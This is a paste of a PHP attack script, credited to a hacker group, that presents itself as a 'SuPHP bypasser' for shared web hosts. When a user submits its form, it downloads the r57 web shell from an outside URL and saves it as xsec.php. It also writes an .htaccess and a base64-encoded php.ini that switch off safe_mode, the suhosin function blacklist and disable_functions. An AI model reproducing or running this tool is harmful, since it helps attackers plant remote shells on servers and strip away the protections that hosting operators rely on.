
Bypass SuPHP Version 2 [ Sfa7 trick ]

Feb 2nd, 2018
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PHP 2.60 KB | None | 0 0
  1. <?
  2. /*
  3.  Coded By : xSecurity
  4.  Homepage : sec4ever.com
  5.  Email    : b0x@hotmail.com
  6.  Blog     : drkroooz.wordpress.com
  7.  Greets 2 : b0x - No-QRQR - R.B.G HaCkEr - DamaneDz - FoX HaCkEr - is-sec.com
  8. */
  9. echo "<form method='POST'>
  10. <title>SuPHP Bypasser</title>
  11. <pre>Bypass SuPHP :D</pre>
  12. <input type='text' name='path' value=".dirname(__FILE__)." style='font-family: Tahoma size: 2pt ; color: red; border: 1px dotted red'>
  13. <input type='text' name='shell' value='http://c99.gen.tr/r57.txt' style='font-family: Tahoma size: 2pt ; color: red; border: 1px dotted red'>
  14. <input type='submit' value='Bypass' name='start' style='font-family: Tahoma size: 2pt ; color: red; border: 1px dotted red'><br>";
  15. echo "<textarea rows='4' cols='60' style='font-family: Tahoma size: 2pt ; color: red; border: 1px dotted red'>xSecurity Mode :- \n";
  16.         if($_POST['start']) {
  17.         $path = $_POST['path'];
  18.         $file = $_POST['shell'];
  19.         $htaccess = "suPHP_ConfigPath $path/xsecurity/php.ini";
  20.         $phpini = "c2FmZV9tb2RlID0gT0ZGCnN1aG9zaW4uZXhlY3V0b3IuZnVuYy5ibGFja2xpc3QgPSBOT05FCmRpc2FibGVfZnVuY3Rpb25zID0gTk9ORQ==";
  21.         $dir = "xsecurity";
  22.                 if(file_exists($dir)) {
  23.                         echo "[+] xSecurity Folder There Before :)\n";
  24.                 } else {
  25.                         @mkdir($dir); {
  26.                                 echo "[+] xSecurity Folder Created :D\n";
  27.                 } }
  28.         # Generate Sh3LL
  29.        $fopen = fopen("xsecurity/xsec.php",'w');
  30.         $shell = @file_get_contents($file);
  31.         $swrite = fwrite($fopen ,$shell);
  32.         if($swrite){
  33.                 echo "[+] Sh3LL Has Been Generated Name : xsec.php \n";
  34.         } else {
  35.                 echo "[~] Can't Generate Sh3LL\n";
  36.         }
  37.         fclose($fopen);
  38.         # Generate Htaccess
  39.        $hopen = fopen("xsecurity/.htaccess", "w");
  40.         $hwrite = fwrite($hopen, $htaccess);
  41.         if($hwrite){
  42.                 echo "[+] htaccess Generated\n";
  43.         } else {
  44.                 echo "[~] Can't Generate Htaccess\n";
  45.         }
  46.         fclose($hopen);
  47.         $ini = fopen("xsecurity/php.ini" ,"w");
  48.         $php = fwrite($ini, base64_decode($phpini));
  49.                 if($php){
  50.                         echo "[+] PHP.INI Generated";
  51.                 } else {
  52.                         echo "[-] Can't Generate PHP.INI";
  53.                 }
  54. }
  55. echo "</textarea><pre><center>
  56. [!] if you got [ internal server error ] Thats Mean Bypass Dosen't Work :)
  57. Coded By xSecurity | Homepage : sec4ever.Com
  58. Greets 2 : b0x - NoQRQR - R.B.G - is-sec.com | Design <u>ZaIdOoHxHaCkEr</u> <3<3</center></pre>";
  59. ?>
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